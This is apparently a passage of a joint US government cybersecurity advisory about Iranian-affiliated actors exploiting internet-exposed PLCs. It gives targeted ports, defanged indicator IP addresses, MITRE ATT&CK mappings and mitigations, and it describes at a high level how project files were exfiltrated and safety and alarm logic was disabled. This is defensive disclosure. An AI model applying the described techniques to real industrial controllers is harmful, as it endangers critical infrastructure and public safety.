<li>Remove PLCs from direct internet exposure via secure gateway and firewall; work with IT/OT team members and/or integrators to perform this action.</li>
<li>Query available logs for the provided indicators of compromise (IOCs) and check available logs for suspicious traffic on the ports associated with OT devices, including <code>44818</code>, <code>2222</code>, <code>102</code>, and <code>502</code>, especially traffic originating from foreign hosting providers.</li>
<li>For Rockwell Automation devices, place the physical mode switch on the controller into run position. If you suspect your organization was targeted, including against other branded PLC devices, contact the authoring agencies and PLC manufacturer for guidance.</li>
</ul>
</td>
</tr>
<tr>
<th>Indicators of Compromise</th>
<td>
<p>For a downloadable copy of July 22, 2026<strong> </strong>IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.xml">AA26-097A STIX XML</a> (July 2026) (29 KB)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.json">AA26-097A STIX JSON</a> (July 2026) (30 KB)</li>
</ul>
<p>For a downloadable copy of historical April 7, 2026 IOCs, see:</p>
<ul>
<li><a href="https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.xml" title="AA26-097A STIX XML">AA26-097A STIX XML</a> (36 KB)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.json" title="AA26-097A STIX JSON">AA26-097A STIX JSON</a> (12 KB)<br> </li>
</ul>
</td>
</tr>
<tr>
<th>Intended Audience</th>
<td>
<p><strong>Organizations:</strong> Critical Infrastructure</p>
<p><strong>Sectors: </strong><a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector" title="Government Services and Facilities">Government Services and Facilities</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a> (WWS), and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy">Energy</a> </p>
<p><strong>Roles: </strong>Integrators, asset owners, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity" title="Defensive cybersecurity analysts">defensive cybersecurity analysts</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/operational-technology-ot-cybersecurity-engineering" title="OT cybersecurity engineers">OT cybersecurity engineers</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-architecture" title="cybersecurity architects">cybersecurity architects</a>, <a href="https://niccs.cisa.gov/tools/nice-framework/work-role/secure-systems-development" title="secure systems developer">secure systems developer</a></p>
</td>
</tr>
</tbody>
</table>
<h2><strong>Introduction</strong></h2>
<p><strong>Note:</strong><em> This advisory was originally published on April 7, 2026, to provide tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) related to ongoing cyber exploitation of internet-connected operational technology (OT) devices by</em> <em>Iranian-affiliated advanced persistent threat (APT) actors. The authoring agencies updated this advisory on July 22, 2026, to add new guidance on detecting malicious changes in reusable code modules leveraged within Rockwell Automation PLC programs. It also expands the manufacturer scope to include observed targeting of Schneider Electric, Siemens, and potentially other branded/manufactured PLCs, emphasizing the importance of restricting direct internet access and providing best practice resources for secure deployment.</em></p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), Department of Energy (DOE), United States Cyber Command – Cyber National Mission Force (CNMF), and Department of the Treasury (Treasury) (hereafter referred to as the “authoring agencies”) are urgently warning U.S. organizations of ongoing cyber exploitation of internet-connected OT devices—including PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other manufactured PLCs—across multiple U.S. critical infrastructure sectors. As a result of this activity, organizations from multiple U.S. critical infrastructure sectors experienced disruptions through malicious interactions with PLC project files<a href="https://www.cisa.gov/#Note1"><sup>1</sup></a> and the manipulation of data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays. In a few cases, this activity caused operational disruption and financial loss.</p>
<p>The authoring agencies assess a group of Iranian-affiliated APT actors is conducting this activity to cause disruptive effects within the United States. The group targeted devices spanning multiple U.S. critical infrastructure sectors, including <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector" title="Government Services and Facilities">Government Services and Facilities</a> (to include local municipalities), <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">Water and Wastewater Systems</a> (WWS), and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy">Energy</a> Sectors. The authoring agencies previously reported on similar activity targeting PLCs by <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a" title="CyberAv3ngers">CyberAv3ngers</a> (aka Shahid Kaveh Group)—a cyber threat actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC).</p>
<p>Due to the widespread use of these PLCs, and the potential for additional targeting of other branded OT devices across critical infrastructure, the authoring agencies recommend U.S. organizations urgently review the TTPs and IOCs in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the <a href="https://www.cisa.gov/#Mitigations"><strong>Mitigations</strong></a> section of this advisory to reduce the risk of compromise.</p>
<p>If owners and operators discover an affected internet-accessible device in their environment, additional technical measures may be necessary to evaluate the risk of compromise. Please engage your cyber incident response plans and contact the authoring agencies and applicable vendors through existing support channels available to customers and integrators (see <a href="https://www.cisa.gov/#Contact"><strong>Contact Information</strong></a>) to receive support, mitigation, and investigation assistance.</p>
<p>For more information on Iranian malicious cyber activity, see CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran" title="Iran Cyber Threat Overview and Advisories">Iran Threat Overview and Advisories</a> webpage and the FBI’s <a href="https://www.fbi.gov/investigate/counterintelligence/the-iran-threat" target="_blank" title="Iran Threat">Iran Threat</a> and Iran <a href="https://www.fbi.gov/investigate/cyber/cyber-threat-overview-iran" target="_blank" title="Iran Cyber Threat">Cyber Threat Overview</a> webpages.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2026-07/aa26-097a-iranian-affiliated-cyber-actors-exploit-programmable-logic-controllers-across-us-critical-infrastructure_508c.pdf" class="c-file__link" target="_blank">Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure</a>
    <span class="c-file__size">(PDF,       1.09 MB
  )</span>
  </div>
</div>
<p><em><strong>(New, July 22, 2026)</strong></em> For a downloadable copy of July 22, 2026<strong> </strong>IOCs, see:</p>
<ul type="square">
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.xml">AA26-097A STIX XML</a> (XML, 29 KB)</li>
<li><a href="https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.json">AA26-097A STIX JSON</a> (JSON, 30 KB)</li>
</ul>
<p>For a downloadable copy of historical April 7, 2026 IOCs, see:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.xml" class="c-file__link" target="_blank">AA26-097A.stix_.xml</a>
    <span class="c-file__size">(XML,       35.97 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.json" class="c-file__link" target="_blank">AA26-097A.stix_.json</a>
    <span class="c-file__size">(JSON,       11.87 KB
  )</span>
  </div>
</div>
<h2><strong>Background Information</strong></h2>
<h3><strong>Similar Historical Activity Targeting Programmable Logic Controllers</strong></h3>
<p>During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as "CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784, APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691, and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including the WWS. APT actors developed and deployed custom ladder logic code to these devices, replacing the valid ladder logic with malicious code that continues to be observed to date.</p>
<p>For more information on this group’s activity, see the joint Cybersecurity Advisory <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a" title="IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities">IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities</a>.</p>
<h3><strong>Ongoing Threat Actor Activity Against U.S.-Based Programmable Logic Controllers</strong></h3>
<p>The FBI observed Iranian-affiliated APT actors targeting internet-exposed PLCs with the intent to cause disruptions—including maliciously interacting with project files, and manipulating data displayed on HMI and SCADA displays—to U.S. critical infrastructure organizations. Iranian-affiliated APT targeting campaigns against U.S. critical infrastructure have recently escalated, likely in response to hostilities between Iran, and the United States and Israel.</p>
<p><em><strong>(New, July 22, 2026) </strong></em>At one U.S. victim, the FBI observed the APT actors download a malicious project file to a targeted PLC using configuration software. Analysis indicated the project file retained ladder logic for downstream function but added logic that overrode specific instruction sets responsible for maintaining safe operating parameters in the victim’s environment.</p>
<p>Since at least March 2026, the authoring agencies identified (through engagements with victim organizations) an Iranian-affiliated APT group disrupted the function of PLCs. Organizations across several U.S. critical infrastructure sectors (including <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector" title="Government Services and Facilities">Government Services and Facilities</a>, <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector" title="Water and Wastewater Systems">WWS</a>, and <a href="https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector" title="Energy">Energy</a> Sectors) deployed these PLCs within a wide variety of industrial automation processes. Some of the victims experienced operational disruption and financial loss.</p>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v19/matrices/enterprise/" target="_blank" title="MITRE ATTACK Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 19. See the <a href="https://www.cisa.gov/#MITRE"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a> section of this advisory for tables of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3><strong>Initial Access</strong></h3>
<p><em><strong>(Updated, July 22, 2026)</strong></em> The authoring agencies observed Iranian-affiliated APT actors using several foreign-based IP addresses to access internet-facing PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other manufactured PLCs [<a href="https://attack.mitre.org/versions/v19/techniques/T0883/" target="_blank" title="T0883">T0883</a>]. The actors used leased, third-party hosted infrastructure and manufacturers’ PLC programming software to connect to misconfigured victim PLCs. Inbound malicious traffic has been observed targeting PLC devices on the following ports: <code>44818</code>, <code>2222</code>, <code>102</code>, and <code>502</code>, as well as targeting modems on port <code>22</code>. Targeted devices include:</p>
<ul type="square">
<li><strong>Rockwell Automation:</strong> CompactLogix and Micro850 PLCs</li>
<li><strong>Schneider Electric:</strong> BMX P34/Modicon M340 PLCs</li>
<li><strong>Siemens:</strong> S7-1200 series PLCs</li>
</ul>
<h3><strong>Command and Control</strong></h3>
<p><em><strong>(Updated, July 22, 2026)</strong></em> The targeting of ports [<a href="https://attack.mitre.org/versions/v19/techniques/T0885/" target="_blank" title="T0885">T0885</a>] associated with other OT vendors’ protocols suggests these actors are opportunistically targeting devices manufactured by companies other than Rockwell Automation/Allen-Bradley, including Schneider Electric and Siemens. In one reported instance, the actors utilized Dropbear Secure Shell (SSH) software on victim modems to enable them to gain remote access through port <code>22</code> [<a href="https://attack.mitre.org/versions/v19/techniques/T1219/" target="_blank" title="T1219">T1219</a>].</p>
<h3><strong>Exfiltration</strong></h3>
<p><em><strong>(New, July 22, 2026) </strong></em>The authoring agencies observed Iranian-affiliated APT actors using configuration software—such as Rockwell Automation’s Studio 5000 Logix Designer, Schneider Electric’s EcoStruxure Control Expert, and Siemens’ Totally Integrated Automation (TIA) Portal—on leased, third-party hosted infrastructure to exfiltrate device project files from PLC devices to threat-actor-controlled infrastructure [<a href="https://attack.mitre.org/versions/v19/techniques/T1041/" target="_blank" title="T1041">T1041</a>].</p>
<h3><strong>Impact</strong></h3>
<p><em><strong>(Updated, July 22, 2026)</strong></em> After the actors extracted device project files, the FBI and CISA identified the modification and deletion of project file logic, to include Add-On Instructions (AOIs) and data manipulation on HMI and SCADA displays [<a href="https://attack.mitre.org/versions/v19/techniques/T1565/" target="_blank" title="T1565">T1565</a>]. Additionally, the changes disabled critical shutdown and alarm logic, allowing systems to enter unsafe conditions without notifying operators of the anomalies.</p>
<p><strong>Note:</strong> An AOI is analogous to a “Function Block” or “User Defined Function Block” used in other PLC vendor programs.</p>
<h2><strong>Indicators of Compromise</strong></h2>
<p>See <a href="https://www.cisa.gov/#Table1"><strong>Table 1</strong></a><strong> </strong>and <a href="https://www.cisa.gov/#Table2"><strong>Table 2</strong></a> for recent IP addresses used by the Iranian-affiliated APT actors to communicate with PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, and Siemens in the United States.</p>
<p><strong>Disclaimer:</strong> The FBI observed the threat actors using the IP addresses listed below in the specified time frames. This data is being provided for customers to query against logs for indications of historical targeting by the Iranian-affiliated APT actors. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"></a>Table 1. Indicators of Compromise <em><strong>(New, July 22, 2026)</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Indicator</th>
<th role="columnheader">Beginning of Actor Association</th>
<th role="columnheader">End of Actor Association</th>
</tr>
</thead>
<tbody>
<tr>
<td>185.82.73[.]175</td>
<td>September 2025</td>
<td>February 2026</td>
</tr>
<tr>
<td>141.11.164[.]153</td>
<td>January 2026</td>
<td>June 2026</td>
</tr>
<tr>
<td>175.110.121[.]42</td>
<td>February 2026</td>
<td>March 2026</td>
</tr>
<tr>
<td>175.110.121[.]39</td>
<td>February 2026</td>
<td>March 2026</td>
</tr>
<tr>
<td>175.110.121[.]41</td>
<td>February 2026</td>
<td>March 2026</td>
</tr>
<tr>
<td>175.110.121[.]107</td>
<td>February 2026</td>
<td>February 2026</td>
</tr>
<tr>
<td>192.142.54[.]79</td>
<td>May 2026</td>
<td>June 2026</td>
</tr>
<tr>
<td>84.200.205[.]165</td>
<td>May 2026</td>
<td>June 2026</td>
</tr>
<tr>
<td>185.225.17[.]225</td>
<td>June 2026</td>
<td>July 2026</td>
</tr>
<tr>
<td>79.133.46[.]209</td>
<td>July 2026</td>
<td>July 2026</td>
</tr>
<tr>
<td>88.80.150[.]199</td>
<td>July 2026</td>
<td>July 2026</td>
</tr>
<tr>
<td>88.80.150[.]200</td>
<td>July 2026</td>
<td>July 2026</td>
</tr>
<tr>
<td>88.80.150[.]202</td>
<td>July 2026</td>
<td>July 2026</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"></a>Table 2. Indicators of Compromise </caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Indicator</th>
<th role="columnheader">Beginning of Actor Association</th>
<th role="columnheader">End of Actor Association</th>
</tr>
</thead>
<tbody>
<tr>
<td>185.82.73[.]162</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]164</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]165</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]167</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]168</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]170</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>185.82.73[.]171</td>
<td>January 2025</td>
<td>March 2026</td>
</tr>
<tr>
<td>135.136.1[.]133</td>
<td>March 2026</td>
<td>March 2026</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor"></a><a class="ck-anchor"><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></a></h2>
<p>See <a href="https://www.cisa.gov/#Table3"><strong>Table 3</strong></a> to <a href="https://www.cisa.gov/#Table6"><strong>Table 6</strong></a><strong> </strong>for all referenced threat actor tactics and techniques in this advisory. The authoring agencies recommend organizations review historical TTPs for similar Iranian-affiliated cyber actor activity in <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a" title="IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities">IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities</a>. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"></a>Table 3. Initial Access</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Internet Accessible Device</td>
<td><a href="https://attack.mitre.org/versions/v19/techniques/T0883/" target="_blank" title="T0833">T0883</a></td>
<td>The actors accessed and interacted with publicly exposed, internet-accessible PLCs that lacked sufficient network and/or hardening security controls.</td>
</tr>
</tbody>
</table>
<p> </p>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption>Table 4. Command and Control</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Commonly Used Port</td>
<td><a href="https://attack.mitre.org/versions/v19/techniques/T0885/" target="_blank" title="T0885">T0885</a></td>
<td>The actors leveraged commonly used OT ports to communicate with PLCs.</td>
</tr>
<tr>
<td>Remote Access Tools </td>
<td><a href="https://attack.mitre.org/versions/v19/techniques/T1219/" target="_blank" title="T1219">T1219</a></td>
<td>The actors deployed Dropbear SSH software on victim modems to enable them to gain remote access through port <code>22</code>.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption>Table 5. Exfiltration <em><strong>(New, July 22, 2026)</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Exfiltration Over C2 Channel</td>
<td><a href="https://attack.mitre.org/versions/v19/techniques/T1041/" target="_blank" title="T1041">T1041</a></td>
<td>The actors used remote, third-party hosted infrastructure as a C2 channel to transfer device project files out of victim environments.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><a class="ck-anchor"></a>Table 6. Impact</caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Data Manipulation</td>
<td><a href="https://attack.mitre.org/versions/v19/techniques/T1565/" target="_blank" title="T1565">T1565</a></td>
<td>The actors maliciously interacted with project files, including modifying and deleting project file logic, and altered data displayed on HMI and SCADA displays.</td>
</tr>
</tbody>
</table>
<h2><a class="ck-anchor"><strong>Mitigations</strong></a></h2>
<p>The authoring agencies recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the <a href="https://www.cisa.gov/cpg" title="Cross-Sector Cybersecurity Performance Goals (CPGs)">Cross-Sector Cybersecurity Performance Goals (CPGs)</a> developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cpg" title="CPGs webpage">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<h3><strong>Network Defenders</strong></h3>
<p>The cyber threat actors accessed PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other branded/manufactured PLCs to cause disruptions to victim systems. To safeguard against this threat and threats to other types of PLCs, the authoring agencies urge organizations to consider the following mitigations.</p>
<p><em><strong>(Updated, July 22, 2026)</strong></em> In addition to contacting the authoring agencies, organizations and integrators operating PLCs from the manufacturers mentioned in this advisory should review the previously issued guidance to strengthen the security of their OT deployments:</p>
<ul type="square">
<li><strong>Rockwell Automation:</strong> Contact the Rockwell Automation Product Security Incident Response Team (PSIRT) at <a href="mailto:PSIRT@rockwellautomation.com">PSIRT@rockwellautomation.com</a> for questions regarding this guidance, or to report cyber incidents related to Rockwell Automation products.<br>
<ul type="circle">
<li>Refer to Rockwell Automation Security Advisory <a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1771.html" target="_blank" title="SD1771">SD1771</a> for recommended PLC hardening measures and configuration guidance.</li>
</ul>
</li>
<li><strong>Schneider Electric:</strong> Contact the Schneider Electric Corporate Product Cyber Emergency Response Team (CPCERT) at <a href="mailto:cpcert@se.com">cpcert@se.com</a> for questions regarding this guidance, or to report cyber incidents related to Schneider Electric products.<br>
<ul type="circle">
<li>Refer to Schneider Electric’s <a href="https://download.se.com/files?p_File_Name=Cybersecurity_Best+Practices_EN.pdf&amp;p_Doc_Ref=7EN52-0390&amp;p_enDocType=White+Paper" target="_blank" title="Recommended Cybersecurity Best Practices">Recommended Cybersecurity Best Practices</a> and <a href="https://download.se.com/files?p_Doc_Ref=EIO0000001999&amp;p_enDocType=User+guide&amp;p_File_Name=EIO0000001999-13_Modicon_Controller_Platform_Cybersecurity_Guide_EN.pdf" target="_blank" title="Cybersecurity User Guide for Modicon Controller Platform">Cybersecurity User Guide for Modicon Controller Platform</a> for guidance on securing and configuring PLCs.</li>
</ul>
</li>
<li><strong>Siemens:</strong> Contact Siemens ProductCERT at <a href="mailto:productcert@siemens.com">productcert@siemens.com</a> for questions regarding this guidance, or to report cyber incidents and vulnerabilities related to Siemens products.<br>
<ul type="circle">
<li>Refer to <a href="https://cert-portal.siemens.com/productcert/html/ssb-104599.html" target="_blank" title="Siemens Security Bulletin 104599">Siemens Security Bulletin 104599</a> for a list of security measures to harden PLCs and in-depth configuration guides.</li>
<li>Siemens users should review the <a href="https://cert-portal.siemens.com/operational-guidelines-industrial-security.pdf" target="_blank" title="Cybersecurity for Industry Operational Guidelines">Cybersecurity for Industry Operational Guidelines</a> and implement defense-in-depth controls within their automation systems.</li>
</ul>
</li>
</ul>
<p><strong>Immediate steps to prevent the attack:</strong></p>
<ul type="square">
<li><strong>Disconnect the PLC from the public-facing internet</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#SecureInternetFacingDevices3S" title="CPG 3.S">CPG 3.S</a>]. Follow the joint guidance <a href="https://www.ncsc.gov.uk/collection/operational-technology/secure-connectivity" target="_blank" title="Secure Connectivity Principles for OT">Secure connectivity principles for OT</a> to safely allow remote access. Specifically, “remove inbound port exposure,” so the OT system is never directly exposed to the internet or external networks, and to ensure all access is mediated, monitored, and controlled. Do this through a secure gateway (jump host) that brokers the connection.<br>
<ul type="circle">
<li>Ensure cellular modems, used for remote field connectivity and access, are secured with strong authentication and updated.</li>
<li>Enable logs for connected modems and regularly review for suspicious activity to detect intrusions and improve incident response speed.</li>
<li><em><strong>(New, July 22, 2026) </strong></em>To mitigate unauthorized access to OT via cellular modems, organizations should consider implementing isolated architectures, such as private Access Point Name (APN), 5G Public Network Integrated Non-Public Network (PNI-NPN), cellular Software-Defined Wide Area Network (SD-WAN), Zero Trust Network Access (ZTNA), or a site-to-site virtual private network (VPN).</li>
</ul>
</li>
<li><em><strong>(New, July 22, 2026) </strong></em><strong>Strictly control network access to PLC devices.</strong><br>
<ul type="circle">
<li>Configure firewall rules or access control list (ACL) security features on PLCs or programmable controllers to allow only authorized communications between expected control system devices. Block access from unauthorized or threat actor-controlled IP addresses, such as those associated with hosting providers.</li>
</ul>
</li>
<li><strong>For controllers with a physical mode switch, place the physical mode switch into run position to prevent remote modification. </strong>Devices should only be in the program or remote position when updating or downloading software online and immediately switched back to the run position when complete. (See Rockwell Automation’s<a href="https://www.cisa.gov/#Note2"><sup>2</sup></a><sup> </sup><a href="https://literature.rockwellautomation.com/idc/groups/literature/documents/rm/secure-rm001_-en-p.pdf" target="_blank" title="System Security Design Guidelines">System Security Design Guidelines</a> for manufacturer’s instructions.)<br>
<ul type="circle">
<li><em><strong>(New, July 22, 2026)</strong> </em>Prior to switching the device to run mode, review and validate project files, as changing modes will lock in the current project file downloaded to the device.</li>
</ul>
</li>
<li><strong>For devices that allow software key switching, </strong>enable programming protection in PLC configuration software (S7 TIA Portal) to limit who can modify PLCs remotely. (See Siemens’ <a href="https://assets.new.siemens.com/siemens/assets/api/uuid:c9a2de6e-6bd0-4c32-bba0-f64cac44fcc9/industrial-security-operational-guidelines-en.pdf" target="_blank" title="Cybersecurity for Industry Operational Guidelines">Cybersecurity for Industry Operational Guidelines</a> for the manufacturer’s instructions.)</li>
</ul>
<p><strong>Follow-up steps to strengthen security posture:</strong></p>
<ul type="square">
<li><em><strong>(New, July 22, 2026)</strong> </em><strong>Review project files running on PLCs for unauthorized changes.</strong> Use vendor-provided integrity checking tools and visually compare the running program to known good logic. Ensure reusable logic and input/output configurations are valid. For Rockwell Automation PLCs listed in the <a href="https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1771.html" target="_blank" title="Customer Guidance to Disconnect Devices from the Internet">Customer Guidance to Disconnect Devices from the Internet</a>, check the AOIs for any anomalous modifications.<br>
<ul type="circle">
<li>If restoring from backups, verify the backup does not contain malicious logic before deployment.</li>
<li>Review logs and configurations on all connected devices, including modems, HMIs, and workstations, to assess potential lateral movement by threat actors. If it appears the actors connected to additional devices, reimage these devices to remove any potential malicious changes or access tools.</li>
</ul>
</li>
<li><em><strong>(New, July 22, 2026)</strong> </em><strong>Ensure device passwords are changed from their default </strong>and are configured to use complex, unique combinations of letters, numbers, and symbols that are not easily guessable. Implementing robust password practices remains a critical security measure that can help prevent unauthorized access and strengthen the overall security posture of OT devices.</li>
<li><em><strong>(New, July 22, 2026)</strong> </em><strong>Take defensive measures to minimize the risk of exploitation. </strong>Conduct comprehensive impact analysis and risk assessments prior to deploying defensive measures.</li>
<li><strong>Create and test strong backups of the logic and configurations of PLCs</strong>. Store backup files offline and secure the physical removal media to enable fast recovery.</li>
<li><strong>Implement multifactor authentication</strong> <strong>(MFA)</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F" title="CPG 3.F">CPG 3.F</a>] for access to the OT network from an external network.</li>
<li>If remote access is required, <strong>implement a network proxy, gateway, firewall, and/or VPN in front of the PLC to control network access</strong>.<br>
<ul type="circle">
<li>A VPN or gateway device can enable MFA for remote access even if the PLC does not support MFA. Implement security rules on these higher-level network security mechanisms to prevent the type of repeated and sustained login attempts seen during a brute force attack. When possible, implement a device control list for workstations sending messages or connecting to OT components.</li>
<li>Use the device control list to monitor for logon activity for unexpected or unusual access to devices from the internet.</li>
</ul>
</li>
<li><strong>Keep PLC devices updated with the latest software patches issued by the manufacturer.</strong> Use established downtime windows to install patches. <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities">Known Exploited Vulnerabilities</a> may need to be prioritized outside a downtime window.</li>
<li><strong>Configure external and internal firewalls to block traffic using common ports </strong>associated with network protocols that are unnecessary for the particular network segment.</li>
<li><strong>Disable any unused authentication methods, logic, or features, </strong>such as default authentication keys and passwords, as well as unused or needed services such as Teletype Network (Telnet), File Transfer Protocol (FTP), Remote Desktop Protocol (RDP), Virtual Network Computing (VNC), and web services.</li>
<li><strong>Monitor asset management systems for device configuration changes</strong>, which can be used to understand expected parameter settings.</li>
<li><strong>Monitor the content of network traffic</strong> for the following:<br>
<ul type="circle">
<li>Unusual logins to internet-connected devices or unexpected protocols to/from the internet. </li>
<li>Functions of industrial control systems management protocols that change an asset’s operating mode or modify programs.</li>
</ul>
</li>
<li><em><strong>(New, July 22, 2026)</strong> </em><strong>Ensure service providers are informed of active threats targeting internet-connected PLC devices. </strong>Owners and operators should communicate directly with service providers to address risks, especially when remote monitoring or maintenance is involved. Some service providers may rely on internet connectivity essential to monitor and maintain OT/ICS operations but may not be fully aware of active threats.</li>
</ul>
<p>In addition, the authoring agencies recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, as well as reduce the impact and risk of compromise by cyber threat actors:</p>
<ul type="square">
